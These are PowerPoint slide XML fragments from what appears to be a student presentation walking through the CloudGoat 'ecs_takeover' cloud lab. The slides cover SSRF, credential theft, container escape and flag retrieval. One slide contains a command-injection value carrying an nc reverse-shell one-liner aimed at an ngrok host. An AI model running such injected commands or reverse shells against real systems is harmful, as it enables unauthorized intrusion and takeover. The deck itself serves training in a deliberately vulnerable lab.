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6" r:id="rId4"/>
    <p:sldId id="258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0" r:id="rId18"/>
    <p:sldId id="3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B050"/>
    <a:srgbClr val="E7E7E7"/>
    <a:srgbClr val="0070C0"/>
    <a:srgbClr val="FFE699"/>
    <a:srgbClr val="7F7F7F"/>
    <a:srgbClr val="F8CBAD"/>
    <a:srgbClr val="7030A0"/>
    <a:srgbClr val="002060"/>
    <a:srgbClr val="9CD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5EF7-901B-C005-4796-ADEEC5BD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0CE4D-7C5B-AE98-1ACF-BCE54739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D2FE-9CA7-7769-5E41-6C34EF73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B5E2E-5F86-5CDE-7DEE-A2B56FF7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22143-76EA-FC2B-6E36-79194171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9F2C-1174-8C58-C9EB-93AF795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F50F9-40FB-C6B8-3CCA-50FCA74F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E26D5-E1F3-441A-514B-9DE78A76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82E1B-EF5A-1D8D-7AB8-E98725C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04B07-8334-E5C1-A277-B1694E9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1F950-9C74-CF31-CB4C-E1C05247F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CC377-CF29-A27E-96D3-719119EE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DA7EA-9563-BF1B-F338-1A31BD2F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C7F94-C678-8329-81B7-F4895518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49023-F896-4CD8-C337-4287F46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1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E3E3-C189-DA6F-B4E8-ABED7E33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68984-9ABB-A310-E0CF-38EE43B2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E64E7-CF3F-B69D-9362-31048A3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66A7C-26F5-769D-9ACD-99212E2B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BC5A4-5BA6-1523-4FA6-20AA7C65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73080-9BC2-E311-D94C-9E90501B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CF1BF-B96E-C15E-718C-141FA262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CE52E-9715-CED7-9B64-CFDD3BF7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C84A2-1636-3B22-A57C-4CA10BF5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02913-0653-8558-50AA-F2450558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9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35FBC-B391-4161-709C-46761DF2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E035D-D805-9B76-0633-AA896D610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57C72-CF7C-598B-89F7-B50DE86A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32846-531B-A39F-5357-80DB4C75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98FB0-706E-C7A3-4A28-6BAFACC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BF3D8-98B4-9298-A774-92F556FB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32A2-D86E-97EF-2445-0C097D5A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7AD54-3F06-4593-6444-A084ADE2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638B4-AB67-852A-1753-7FE6C399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069C5-F85B-1CE1-9FCE-645E0C50E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09C1E-9426-4833-FCBD-CDB87C2B2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32D89-C627-91FB-277E-C8C97EE7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7C9B2D-0D25-89DC-0E9C-8AE4CE55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1F5A23-BC9A-FCF5-8181-0EB47350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2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C3DD-DD9E-FA71-96E1-25D70A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C9C99B-71D6-1937-3E60-C82D2C9F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27FD9-1FA7-DD43-20B6-B7161A95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2AE3F-33C3-9499-63A4-C64C1AF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6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CA95BC-56D0-01A1-60F8-AFC616D6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DAC7A-8678-07AC-0A0A-02BD19E8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11C1B-E784-0EB6-B790-3804AB20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4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C92E9-E9CA-625E-5F9E-BAF1494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5D945-F76F-67BA-DB58-2406DB0D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AF561-DE06-0157-C780-15B892F17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28ADD-BF10-1D8D-2C94-58183629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9B129-B8E3-0DEF-B6CF-9816193F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9A524-A22C-7D14-1B12-B0FBDEC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06878-89F0-E5FD-B591-3F646A54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AFBEBE-BD35-0EA2-3131-5993C86CA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61FFB-4F02-7B51-F1C9-42A2B27A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4BB70-885C-CC4D-F6E5-C787C3F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572D99-850A-FD8A-1440-2AC2109B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70809-E638-37DC-5A3A-9AF2B88E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05E8C-FEC9-DE5A-064C-CC2E4D23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7638C-3275-2196-F35A-E1E95998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9433E-06F3-3A38-C0E9-9A1E83DAF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38D-D8BB-49AC-9468-495082DB13BB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9F76F-358F-0458-A86C-76986097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28FE5-FC0C-5C7C-4A67-4C2DC7A3C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C094-2B9D-4411-84EA-94743F9C4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0.tcp.jp.ngrok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F142-EF33-9048-4033-4FB927FC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ECS_TAKEOVER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04DA2-2AE4-ACF9-A675-B7B7DC3AF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949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디지털 포렌식 트랙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>정재현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155CC1-D7F5-FA26-59B1-9815BB9533B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2484120" y="3535680"/>
            <a:ext cx="72085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4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40813" y="69884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command is used to list the currently running Docker containers on a system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DA393-5033-5ECC-BD7C-34D298BD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" y="1156870"/>
            <a:ext cx="11361576" cy="1044328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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A66A6E-0004-4C4D-9A95-B1B1571A8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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1022562" y="2896411"/>
            <a:ext cx="7049111" cy="16471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198082-C954-C578-AB8F-23E1F7FF7BF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640812" y="2225639"/>
            <a:ext cx="1113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Docker container escape refers to a method or technique that allows a user or process with access to a Docker container to gain access or privileges on the Docker host or other containers</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="그림 22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1CE36652-418F-FC0E-9C0A-66B6C72F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2" y="4655916"/>
            <a:ext cx="69348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40813" y="69884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execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>revshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> in the local we could follow the below steps</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6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435B5DA1-AC86-B6B2-038B-BE95D006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" y="1168821"/>
            <a:ext cx="2941575" cy="8154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87A7BE-14E8-03CA-4C45-D1D067DE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" y="2122332"/>
            <a:ext cx="10378641" cy="10066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048D81-54B1-D0D2-520B-737EC9709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" y="3267112"/>
            <a:ext cx="10604500" cy="10437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80FC6D-A355-C925-2F25-C9C4317897EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640813" y="4443269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Found out that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> is not in the environment so using bash could help us with the process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6BCCE7-7B5D-8A9E-EF1D-18E358045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" y="4916603"/>
            <a:ext cx="10604500" cy="637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0031F3-BBFB-8FCE-9CB9-17A1D16864CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640813" y="565301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Listening to the port(8226)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/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078F9A-D985-ED7A-D264-9D46EF366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" y="6012568"/>
            <a:ext cx="6394241" cy="8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68805" y="1009987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Successfully executed the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>revshell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43602F3-281F-18BD-C269-C04CF4F3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6" y="1396275"/>
            <a:ext cx="7590178" cy="1143099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="그림 8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6177887D-3517-4E4C-AA3D-07D0E5DD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6" y="2716653"/>
            <a:ext cx="9560766" cy="1866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06E0E-A807-B6E1-4B60-13D7B445FE40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668805" y="4751174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Inspecting the latest docker to find out information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>regarding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82556D-FC29-D1B8-8191-A02D91DB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6" y="5288522"/>
            <a:ext cx="5366520" cy="5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68805" y="75363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Found its not privileged</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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09BED89-FB3F-9E86-ECD0-856E522E0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46"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="996025" y="1263709"/>
            <a:ext cx="5814564" cy="13395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9561F5-209B-4662-C1FE-F1494B16B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5" y="3070047"/>
            <a:ext cx="9134674" cy="1007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2958E6-C23D-1DCE-A54B-1A7EA8A59513}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668805" y="2628063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Executing the command line we see that the below command is not working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BCD6F-4717-3AA2-AD50-6B3B3C36EEE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668805" y="4150129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However by using the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commandline</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> it was possible to get the credentials of it</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="그림 16" descr="텍스트, 스크린샷, 흑백, 블랙이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{158FCD39-6DD5-220A-5AF0-E6C92D9A2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5" y="4743364"/>
            <a:ext cx="10266026" cy="18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7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68805" y="75363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Another configuration for the profile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48DAB0E-64BA-1F8D-EE64-B63F7160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1156870"/>
            <a:ext cx="10008637" cy="1705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D25A30-AC9B-DD24-FBAC-5F57AF002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3464046"/>
            <a:ext cx="11003902" cy="1062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82CD29-167E-7C97-178B-94455C289336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668805" y="2978711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Configured successfully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3302E-0C34-78EC-3520-C67524D8B143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668805" y="4652172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Cluster info of the profile</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/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7A308F8-24BC-86BE-176F-A34E6F30D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5203784"/>
            <a:ext cx="941913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68805" y="75363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Task list of the clusters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2CD29-167E-7C97-178B-94455C289336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668805" y="320928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Analyzing the clusters and the tasks we found a suspicious name value of “vault”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/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03DB445-454F-0F85-0E20-2A9A17989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1153896"/>
            <a:ext cx="10378641" cy="2009481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E08AE33-22A4-7A3A-DD54-285B37FDD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3640495"/>
            <a:ext cx="8086530" cy="30089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6286F9-8B3C-25C0-D98B-80FDE0ABC540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2239347" y="5066522"/>
            <a:ext cx="494522" cy="17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4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68805" y="753638"/>
            <a:ext cx="1037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find out the info we have analyzed the list of task definition and the description of each tasks.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7FFBB2E-3E45-D798-593A-03C96DFB6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405650"/>
            <a:ext cx="9766948" cy="2023350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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824BEE3-70ED-80DC-8A16-1003EC61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51" y="3525199"/>
            <a:ext cx="9057821" cy="32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68805" y="753638"/>
            <a:ext cx="1037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 we continuously analyzed the lists, we found a code that was referring to the flag.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0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BF245AF-2367-FC43-75AB-E3978F99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1156870"/>
            <a:ext cx="9448800" cy="47143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22D1D5-F6F3-9FE5-BF96-5D62267A871B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2015412" y="3251718"/>
            <a:ext cx="4236097" cy="2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2A78F4-1457-E335-570D-0BBEEAF22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81" y="6104362"/>
            <a:ext cx="4922947" cy="586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D0F6EE-C93C-22F3-D27B-522528044B45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6615404" y="6104362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Managing to find the Flag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FLAG_1234577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7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F142-EF33-9048-4033-4FB927FC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Thank you</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4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155CC1-D7F5-FA26-59B1-9815BB9533B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2484120" y="3535680"/>
            <a:ext cx="72085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0951"/>
            <a:ext cx="8296468" cy="96637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Scenario Goal &amp; Summary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3F0D3E-EDF0-891F-1CA2-9AED39E22638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1853294" y="3263610"/>
            <a:ext cx="84854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Gain access to the "vault" container and retrieve the flag.</a:t>
            </a:r>
          </a:p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Attacker exploits vulnerability in an external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Achieves remote code execution within the website's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Utilizes container's access to the host's metadata service and role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Discovers and exploits a mount misconfiguration, gaining unauthenticated Docker access on one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Compromises a semi-privileged container on that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Uses the compromised container's privileges to enumerate the ECS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Finds the "vault" task running on a different node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Manipulates the cluster's state to reschedule the "vault" container to the already compromised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Accesses and retrieves the flag from inside the "vault" container.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그림 1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9817E8D-C884-398D-939D-CD6BEE86DC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87" y="705702"/>
            <a:ext cx="8725678" cy="2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F142-EF33-9048-4033-4FB927FC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Procedure</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4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155CC1-D7F5-FA26-59B1-9815BB9533B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2484120" y="3535680"/>
            <a:ext cx="72085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3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51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AWS_Profile_Configure</a:t>
            </a:r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&amp; Deploy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D0AC0-D90B-8FB5-BE92-1227BB20E42D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="942392" y="877078"/>
            <a:ext cx="750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clone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>git@github.com:RhinoSecurityLabs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>cloudgoat.git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F93D3B-1F18-3CB6-DD28-40540BA0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1343644"/>
            <a:ext cx="9297206" cy="274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7C915-F567-9210-D87B-59A5B9EDF4B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="942392" y="1763898"/>
            <a:ext cx="750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aws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> configure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5393FF-FA5E-F28F-8782-E0D8A561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2" y="2230464"/>
            <a:ext cx="7137918" cy="1224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D9F8D6-580F-9326-D6A6-0B4BE1E57A62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="942392" y="3554039"/>
            <a:ext cx="7501812" cy="16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 clone https://github.com/RhinoSecurityLabs/cloudgoat.git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cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>cloudgoat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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pip3 install -r ./requirements.txt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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> +x cloudgoat.py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./cloudgoat.py create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>ecs_takeover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BC8725-C1E6-AB78-AD1C-AE30B8F0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9" y="5362408"/>
            <a:ext cx="9946432" cy="2122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DEC9C6-E631-56A2-35A5-9BEE42384AD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2688513" y="5877650"/>
            <a:ext cx="620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TOO MUCH ERROR HOWEVER I MANAGED TO SOLVE IT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DEPLOYING THE SCENARIO WAS THE HARDEST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8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D0AC0-D90B-8FB5-BE92-1227BB20E42D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="531844" y="1521127"/>
            <a:ext cx="982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After deploying the scenario start.txt is saved and in the file there is the vulnerable site’s URL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87203E-E66D-AD4E-378C-38CF00FB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4" y="848039"/>
            <a:ext cx="10112616" cy="579170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1DD9AC4-C651-C842-2A51-F44334A02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167458"/>
            <a:ext cx="5388509" cy="3545221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 1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4B8A40A5-3AE1-3D8C-3AC6-1A49A4986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59" y="2167458"/>
            <a:ext cx="4850754" cy="3736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504E73-6F67-243F-42AA-541DA539D845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610484" y="6035844"/>
            <a:ext cx="982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Vulnerable site is a site that shows the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>url’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>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5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D0AC0-D90B-8FB5-BE92-1227BB20E42D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6889750" y="884762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SSRF Vulnerability Detected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04E73-6F67-243F-42AA-541DA539D845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610484" y="6035844"/>
            <a:ext cx="982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Through the vulnerability we could find path where the credential is located and the value of it too</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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39252E9-A6C3-A32A-A6DF-15342152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4" y="883700"/>
            <a:ext cx="6163540" cy="223036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497CCEB-4B01-9299-B449-E44F24CA4477}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="531844" y="3261575"/>
            <a:ext cx="10814782" cy="2329268"/>
            <a:chOff x="531844" y="3230507"/>
            <a:chExt cx="10814782" cy="2329268"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="그림 9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27176FB9-37C9-9753-5321-9E4A2095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44" y="3235791"/>
              <a:ext cx="3362734" cy="2323984"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="그림 12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1494D147-F085-52AE-F777-EE990EB4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578" y="3230507"/>
              <a:ext cx="7452048" cy="2274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3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D0AC0-D90B-8FB5-BE92-1227BB20E42D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="610484" y="723440"/>
            <a:ext cx="267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ec2 profile configure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04E73-6F67-243F-42AA-541DA539D845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2970440" y="3968810"/>
            <a:ext cx="48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Verified that command lines is executable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B619A8-6AEF-A1B6-3B08-537C1A90631A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="610484" y="1156870"/>
            <a:ext cx="9028038" cy="2690958"/>
            <a:chOff x="610484" y="882666"/>
            <a:chExt cx="9648800" cy="28994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97CE3B-A6B1-A295-1CD3-F5DAB2D3E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84" y="882666"/>
              <a:ext cx="8834615" cy="955094"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="그림 10" descr="텍스트, 스크린샷, 폰트, 정보이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{257CC8E8-F3B2-FEAB-7718-CDAB0233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84" y="1837760"/>
              <a:ext cx="9648800" cy="1944359"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="그림 1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E39C2E2-779C-F964-58AC-64C458DF7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2" y="3896069"/>
            <a:ext cx="2469503" cy="27431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7F5475C-29E7-D0BD-8198-0A215A3E9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40" y="4458840"/>
            <a:ext cx="5182049" cy="3505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90F73A2-C48D-D019-1B29-7B9943EC5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40" y="4792814"/>
            <a:ext cx="7750212" cy="4115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0358ED-C5F1-6ECC-B96E-5EE0D748DF87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2970440" y="5342169"/>
            <a:ext cx="791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en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>ngrok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>’  is a tool that creates a secure tunnel to a localhost, allowing you to expose a local server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en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>’ is a versatile networking tool that can read from and write to network connections using TCP or UDP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2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D0AC0-D90B-8FB5-BE92-1227BB20E42D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957537" y="2986915"/>
            <a:ext cx="557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Can notice that is continuously loading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91217D-70CA-FF5B-F241-4E7FE9D2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" y="1126372"/>
            <a:ext cx="10079838" cy="3506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00C019-C5D2-1001-133A-1D7E2BA58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" y="1482236"/>
            <a:ext cx="10319657" cy="328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37475-6B4E-E8E6-0A98-04EE41E2C5A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640814" y="1871524"/>
            <a:ext cx="10217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Execute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test; rm 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f;mkfifo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f;cat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/f|/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> -i 2&gt;&amp;1|nc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>0.tcp.jp.ngrok.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 19632 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>/f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BB0B4E-3022-0D7B-1D57-2270496C4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" y="3051421"/>
            <a:ext cx="1287892" cy="3048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40814" y="698848"/>
            <a:ext cx="557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Executing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>revshell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6" name="그림 2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FAD2CD6-D228-1570-0033-695C2090A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" y="3981473"/>
            <a:ext cx="7795936" cy="12650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858657-EE09-15A8-3980-0032EA6E12B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640814" y="3541752"/>
            <a:ext cx="557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revshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> success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130C-F86B-55E7-F6C8-74B7B204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43617"/>
            <a:ext cx="8427098" cy="966370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ecs_takeover</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3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019D3F-130B-2804-12DF-2881F5E79D9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651B01-75DE-DA9B-D841-DA505EEB793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89AFB9-F579-3385-1C36-72F7782EC823}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640813" y="698848"/>
            <a:ext cx="919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Looking up the main page script</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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EDF46FA-7E30-749F-9AFB-80F81CFA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4" y="1273782"/>
            <a:ext cx="5715495" cy="2598645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71FE131-1D00-749C-81DE-68E5CA385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39" y="337384"/>
            <a:ext cx="5502117" cy="35512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D77733-4926-36BE-14A5-963CBE9A5039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6889750" y="883514"/>
            <a:ext cx="4661437" cy="27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17941-51B9-B684-375E-42A4751D10CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339294" y="4030824"/>
            <a:ext cx="10120322" cy="36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Found something suspicious that it uses a command line to get the website</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="그림 14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6D04002-CE00-399C-9939-1E894639D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2" y="4514009"/>
            <a:ext cx="1197980" cy="1471805"/>
          </a:xfrm>
